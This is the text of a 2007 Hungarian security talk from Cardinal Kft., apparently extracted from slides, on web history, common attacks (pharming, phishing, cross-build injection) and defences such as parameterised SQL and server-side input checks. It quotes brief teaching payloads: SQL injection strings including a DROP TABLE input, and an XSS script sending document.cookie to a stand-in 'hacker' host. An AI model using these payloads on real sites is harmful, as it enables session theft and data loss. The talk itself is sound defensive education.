1 Gyimesi István fejlesztési vezető Cardinal Számítástechnikai Kft. Cardinal Kft., Gyimesi István2 Hova fejlődött az Internet az elmúlt 10 évben? Kom...
Gyimesi István fejlesztési vezető Cardinal Számítástechnikai Kft. www.cardinal.hu
Cardinal Kft., Gyimesi István 2007
.
1
Miért baj, ha Kínában ünnepnap van?
Hova fejlődött az Internet az elmúlt 10 évben? • Kommunkációs protokollok • A web „nyelve” ● Biztonsági kockázatok • Leggyakoribb támadási módok • Védekezési lehetőségek • Felvilágosítás fontossága ●
Cardinal Kft., Gyimesi István 2007
.
2
Miért baj, ha Kínában ünnepnap van? Egy kis Internet történelem - kommunikáció
1974
1981
1996
TCP
IPv4
IPv6 HTTP1.0
Cardinal Kft., Gyimesi István 2007
.
1999
HTTP1.1
2008
?
3
Miért baj, ha Kínában ünnepnap van? Egy kis Internet történelem – a web „nyelve” 1998
1996 ~1960
1991
SGML
HTML
Cardinal Kft., Gyimesi István 2007
.
1995
1997
JavaScript HTML4 DOM XML CSS
2001
2008
XHTML
?
4
Miért baj, ha Kínában ünnepnap van? Egy kis Internet történelem – a web „nyelve” 2003 körül: DHTML (Dynamic HTML) • XHTML oldalak DOM alapú manipulálása • Használt szabványok: • HTML • CSS • JavaScript • DOM
Cardinal Kft., Gyimesi István 2007
.
5
Miért baj, ha Kínában ünnepnap van? Egy kis Internet történelem – a web „nyelve” 2003 körül: DHTML (Dynamic HTML) • XHTML oldalak DOM alapú manipulálása • Használt szabványok: • HTML 1991 • CSS 1996 • JavaScript 1995 • DOM 1998
Cardinal Kft., Gyimesi István 2007
.
6
Miért baj, ha Kínában ünnepnap van? Egy kis Internet történelem – a web „nyelve” 2005: AJAX (Asyncronous JavaScript And XML) • Desktop alkalmazás-szerűbb web alkalmazások • Használt szabványok: • HTTP • XML • CSS • JavaScript • DOM
Cardinal Kft., Gyimesi István 2007
.
7
Miért baj, ha Kínában ünnepnap van? Egy kis Internet történelem – a web „nyelve” 2005: AJAX (Asyncronous JavaScript And XML) • Desktop alkalmazás-szerűbb web alkalmazások • Használt szabványok: • HTTP 1996 • XML 1998 • CSS 1996 • JavaScript 1995 • DOM 1998
Cardinal Kft., Gyimesi István 2007
.
8
Miért baj, ha Kínában ünnepnap van? Lassan 2008-at írunk...
e- bu • Az Internet elavult, webservice sine ss akadályozza a fejlődést. t en m rn ve go e• A böngészők még mindig e- ban különböző mértékben king e c r e támogatják a szabványokat. e-comm • e-megoldásokat erőszakolunk bele
Cardinal Kft., Gyimesi István 2007
.
9
Miért baj, ha Kínában ünnepnap van? Lassan 2008-at írunk... • a HTTP csak kérés-válasz alapú kommunikációt biztosít e- bu • nincs sessionwebservice sine ss management (a cookie t en m rn ve go enem jó megoldás!) e- ban • gyenge a user interface k ing e c r e m • eltérően működő böngészők e-com • elégtelen biztonsági eszközök •Applet? A Microsoft ellehetetlenítette. •Flash? A világ nem tekinti alkalmazásfejlesztő-eszköznek Cardinal Kft., Gyimesi István 2007
.
10
Miért baj, ha Kínában ünnepnap van? Nagyobb üzlet, mint a drogkereskedelem forrás: http://www.channelregister.co.uk/2005/11/29/cybercrime/
Miért baj, ha Kínában ünnepnap van? Támadások fajtái Technológiát támadják: • Exploit-ok (biztonsági hibák, rések kihasználása) • Input támadása • Pharming • DoS • SQL Injection, XSS, XBI, stb. A felhasználót támadják: • Phishing • Whaling • Social Engineering Cardinal Kft., Gyimesi István 2007
.
12
Miért baj, ha Kínában ünnepnap van? Biztonsági rések kihasználása (exploit-ok)
• Már nem unatkozó egyetemisták írnak vírusokat! • Elterjedtek a többrétegű támadások. • A cél adatok (pl. email-címek) gyűjtése és botnet hálózatok kiépítése! A Storm féreg becslések szerint 2 milliós botnet hálózatot hozott létre. • spam-ek küldése (összes levelezés 66%-a spam, és növekszik) • DoS támadások • szuperszámítógépeket meghaladó számítási kapacitás
Cardinal Kft., Gyimesi István 2007
.
13
Miért baj, ha Kínában ünnepnap van? És akkor a kínaiak...
• A céges helyett saját számítógépeik elé ülnek. • Képzetlen felhasználók, nem foglalkoznak a biztonsággal. • Rengeteg gép fertőződik meg egyszerre. (2007. október 1. és 6. között mintegy egymillió)
• Jelenleg a lakosság elenyésző hányada internetezik. (Vidéken pl. csak 5%)
• Félévente 15 millióval több internetező. (XI. ötéves terv: telefon mellé internet is jár)
forrás: http://www.virushirado.hu/hirek_tart.php?id=1209 Cardinal Kft., Gyimesi István 2007
.
14
Miért baj, ha Kínában ünnepnap van? Támadások fajtái Technológiát támadják: • Exploit-ok (biztonsági hibák, rések kihasználása) • Input támadása • Pharming • DoS • SQL Injection, XSS, XBI, stb. A felhasználót támadják: • Phishing • Whaling • Social Engineering Cardinal Kft., Gyimesi István 2007
.
15
Miért baj, ha Kínában ünnepnap van? A kliensoldali vizsgálat nem ér semmit!
Cardinal Kft., Gyimesi István 2007
.
16
Miért baj, ha Kínában ünnepnap van? A kliensoldali vizsgálat nem ér semmit!
Cardinal Kft., Gyimesi István 2007
.
17
Miért baj, ha Kínában ünnepnap van? A kliensoldali vizsgálat nem ér semmit! • Nem szabad az input hosszában, tartalmában megbízni. • A combo-ból is tetszőleges adat jöhet. • A readonly mezők is változtathatók.
strcpy(name, getField(”userName”);
Cardinal Kft., Gyimesi István 2007
.
18
Miért baj, ha Kínában ünnepnap van? Támadások fajtái Technológiát támadják: • Exploit-ok (biztonsági hibák, rések kihasználása) • Input támadása • Pharming • DoS • SQL Injection, XSS, XBI, stb. A felhasználót támadják: • Phishing • Whaling • Social Engineering Cardinal Kft., Gyimesi István 2007
.
19
Miért baj, ha Kínában ünnepnap van? Pharming • DNS bejegyzéseket támad, az IP cím feloldás gyengeségét használja ki. • Vírus segítségével az operációs rendszer hosts file-ját, • Local Network Routerek DNS beállításait, • WiFi routerek DNS beállításait írja át.
Cardinal Kft., Gyimesi István 2007
.
20
Miért baj, ha Kínában ünnepnap van? Pharming • DNS bejegyzéseket támad, az IP cím feloldás gyengeségét használja ki. • Vírus segítségével az operációs rendszer hosts file-ját, • Local Network Routerek DNS beállításait, • WiFi routerek DNS beállításait írja át.
Cardinal Kft., Gyimesi István 2007
.
21
Miért baj, ha Kínában ünnepnap van? Pharming • A tanúsítványok érvényesek maradnak! • Man-in-the-middle jellegű támadásokhoz vezet.
Miért baj, ha Kínában ünnepnap van? Támadások fajtái Technológiát támadják: • Exploit-ok (biztonsági hibák, rések kihasználása) • Input támadása • Pharming • DoS • SQL Injection, XSS, XBI, stb. A felhasználót támadják: • Phishing • Whaling • Social Engineering Cardinal Kft., Gyimesi István 2007
.
23
Miért baj, ha Kínában ünnepnap van? SQL injection • Az SQL szöveges parancsformátum. • Az alkalmazásoknak ilyen parancsokat kell összeállítani. • Megfelelő inputtal támadni lehet az alkalmazást. statement := ”select * from users where name = '” + userName + ”'”;
ha userName értéke: a' or 't' = 't select * from users where name = 'a' or 't' = 't'
de userName lehet akár: a'; DROP TABLE users; -select * from users where name = 'a'; DROP TABLE users; --'; Cardinal Kft., Gyimesi István 2007
.
24
Miért baj, ha Kínában ünnepnap van? SQL injection
• where megváltoztatása • más parancs beszúrása • függvényhívás beszúrása • adatbáziskezelő hibáinak kiaknázása
http://www.securityfocus.com/bid/9587 Cardinal Kft., Gyimesi István 2007
.
25
Miért baj, ha Kínában ünnepnap van? SQL injection Az oktatási anyagokban is fel kell hívni a figyelmet erre!
Forrás: Programming ASP.NET (O'Reilly)
Cardinal Kft., Gyimesi István 2007
.
26
Miért baj, ha Kínában ünnepnap van? Támadások fajtái Technológiát támadják: • Exploit-ok (biztonsági hibák, rések kihasználása) • Input támadása • Pharming • DoS • SQL Injection, XSS, XBI, stb. A felhasználót támadják: • Phishing • Whaling • Social Engineering Cardinal Kft., Gyimesi István 2007
.
27
Miért baj, ha Kínában ünnepnap van? XSS: Cross-site scripting • a támadó javascript kódot küld el bemenetként • ez a kód lefut a böngészőben, amikor ez az input megjelenik a felhasználónál • session azonosító ellopása • input adatok elküldése egy másik szerverre form input: <script>window.location='http://hacker/'+document.cookie echo
echo $userName echo
Cardinal Kft., Gyimesi István 2007
.
28
Miért baj, ha Kínában ünnepnap van? XSS: Cross-site scripting • a támadó javascript kódot küld el bemenetként • ez a kód lefut a böngészőben, amikor ez az input megjelenik a felhasználónál • session azonosító ellopása • input adatok elküldése egy másik szerverre eredmény:
Miért baj, ha Kínában ünnepnap van? Támadások fajtái Technológiát támadják: • Exploit-ok (biztonsági hibák, rések kihasználása) • Input támadása • Pharming • DoS • SQL Injection, XSS, XBI, stb. A felhasználót támadják: • Phishing • Whaling • Social Engineering Cardinal Kft., Gyimesi István 2007
.
30
Miért baj, ha Kínában ünnepnap van? XBI: Cross-build injection • trójai kód elhelyezése nyílt forráskódú programokban • fejlesztőeszközök on-line töltik le a szükséges komponenseket ftp.openbsd.org • a trójai így számos szoftverben elterjed • pharminggal is lehet kombinálni Fejlesztőgép: dev@/source>build <dependency>
pharming
Például: • OpenSSL 3.4p1 trójai (2002., ftp.openssh.com feltörése, a támadó a kódban portot nyitott az internet felé) • SendMail 8.12.6 trójai (2002., ftp.sendmail.org feltörése) Cardinal Kft., Gyimesi István 2007
.
31
Miért baj, ha Kínában ünnepnap van? Védekezés webes alkalmazásokban • Input ellenőrzése minden esetben. (hossz, tartalom, escape-elések)
• Ha kliensoldalon szűrök, nem szűrök semmit. • SQL utasításokat ne sztringekből fűzzük össze. (használjunk paramétereket)
• Minimális jogosultsággal fusson a webes alkalmazás. • Csak a legszükségesebb komponensek legyenek beépítve. • Kimenő oldal vizsgálata, szűrése. • Felhasználók többszintű autentikációja, hitelesítés, többszintű naplózás. • Jelszavak kódolt tárolása, belső kommunkáció titkosítása. (A banki támadások 80%-a belüről jön!) Cardinal Kft., Gyimesi István 2007
.
32
Miért baj, ha Kínában ünnepnap van? Támadások fajtái Technológiát támadják: • Exploit-ok (biztonsági hibák, rések kihasználása) • Input támadása • Pharming • DoS • SQL Injection, XSS, XBI, stb. A felhasználót támadják: • Phishing • Whaling • Social Engineering Cardinal Kft., Gyimesi István 2007
.
33
Miért baj, ha Kínában ünnepnap van? Phishing • adathalász levelek 2006. december: BB, ERSTE, CIB, Raiffeisen, Szigetvári Tksz.
• cél: minél több mail megy ki, arányaiban annál több felhasználó esik áldozatul • erre is jók a botnet hálózatok! • vége: készpénz küldése küldföldre
„So long and thanks for all the phish!” Cardinal Kft., Gyimesi István 2007
.
34
Miért baj, ha Kínában ünnepnap van? Támadások fajtái Technológiát támadják: • Exploit-ok (biztonsági hibák, rések kihasználása) • Input támadása • Pharming • DoS • SQL Injection, XSS, XBI, stb. A felhasználót támadják: • Phishing • Whaling • Social Engineering Cardinal Kft., Gyimesi István 2007
.
35
Miért baj, ha Kínában ünnepnap van? Whaling
• „nagy halakat” keresnek meg vele • cél: kevés, de jól célzott adatkérő levél elküldése
Cardinal Kft., Gyimesi István 2007
.
36
Miért baj, ha Kínában ünnepnap van? Támadások fajtái Technológiát támadják: • Exploit-ok (biztonsági hibák, rések kihasználása) • Input támadása • Pharming • DoS • SQL Injection, XSS, XBI, stb. A felhasználót támadják: • Phishing • Whaling • Social Engineering Cardinal Kft., Gyimesi István 2007
.
37
Miért baj, ha Kínában ünnepnap van? Social engineering • nem feltétlenül az Interneten keresztül történik • emberek hiszékenységének, segítőkészségének kihasználása • pl.: nigériai levelek • bizonyos szempontból a phishing és a whaling is ide tartozik
Cardinal Kft., Gyimesi István 2007
.
38
Miért baj, ha Kínában ünnepnap van? Hitelesítési módok A hitelesítéssel valószínűsítjuk (!), hogy a vonal túloldalán az adott személy van. Elterjedt hitelesítési módok: ● Aláírási jelszó ● TAN-kód ● Chipkártya ● Hitelesítő token ● SMS jelszó
Cardinal Kft., Gyimesi István 2007
.
39
Miért baj, ha Kínában ünnepnap van?
TAN-kód
TAN-kód tábla Felhasználó: Kiss János
egyszer használatos kódok ● jelszavas kiegészítő védelem kell hozzá ● már öt éve is elavultnak tűnt, de az ügyfelek még mindig használják ●
Token fizikailag független eszköz ● kódokat generálnak ● ha nincs PIN-kód, kiegészítő jelszavas védelem kell ●
Cardinal Kft., Gyimesi István 2007
.
41
Miért baj, ha Kínában ünnepnap van?
Chipkártya legerősebb biztonság ● nem terjedt el eléggé ● olvasót, meghajtót telepíteni kell ● elveszik a mobilitás ●
Cardinal Kft., Gyimesi István 2007
.
42
Miért baj, ha Kínában ünnepnap van?
SMS jelszó Magyarország vezető ● első: Konzumbank (2002.) ● egyszer használatos, időkorlátos kódok ● két független csatornát használ, ezeket egyszerre kell támadni ●
Cardinal Kft., Gyimesi István 2007
.
43
Miért baj, ha Kínában ünnepnap van? A tudás hatalom! • Az emberek nincsenek tisztában az Internet lehetőségeivel, korlátaival, veszélyeivel. • A biztonságos internetezésre is meg kell tanítani a felhasználókat. • Céges környezetben kiemelten nagy érték az információ, és a biztonság-tudatosság. • Otthoni WiFi kapcsolatok védelme. • Bluetooth eszközök védelme. • Etikus hacker tanfolyamok. És vigyázzunk az ünnepnapokon...! Cardinal Kft., Gyimesi István 2007